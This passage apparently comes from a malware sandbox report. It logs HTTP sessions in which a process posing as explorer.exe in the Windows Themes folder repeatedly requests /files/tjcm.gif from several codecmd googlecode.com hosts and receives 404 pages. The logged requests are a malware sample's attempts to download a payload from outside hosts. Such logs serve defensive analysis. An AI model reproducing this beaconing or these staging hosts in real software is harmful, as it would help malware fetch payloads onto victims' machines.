Sep 2, 2024 14:25:48.812828064 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:48 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:48.812861919 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
71	192.168.2.5	60939	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:49.137927055 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:49.823256969 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:49 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:49.823276043 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
72	192.168.2.5	60940	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:50.122131109 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:50.836719990 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:50 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:50.836738110 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
73	192.168.2.5	60941	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:51.186814070 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:51.893763065 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:51 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:51.893783092 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
74	192.168.2.5	60942	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:52.300201893 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:52.988888025 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:52 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:52.988936901 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
75	192.168.2.5	60943	66.102.1.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:53.355711937 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd01.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:54.068357944 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:53 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:54.068384886 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
76	192.168.2.5	60944	74.125.133.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:54.414720058 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd02.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:55.107526064 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:55 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> {margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px} > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
Sep 2, 2024 14:25:55.107557058 CEST	494	IN	Data Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
77	192.168.2.5	60945	74.125.71.82	80	6300	C:\Windows\Resources\Themes\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Sep 2, 2024 14:25:55.456502914 CEST	215	OUT	GET /files/tjcm.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: codecmd03.googlecode.com Connection: Keep-Alive
Sep 2, 2024 14:25:56.147106886 CEST	1236	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1575 Date: Mon, 02 Sep 2024 12:25:56 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> 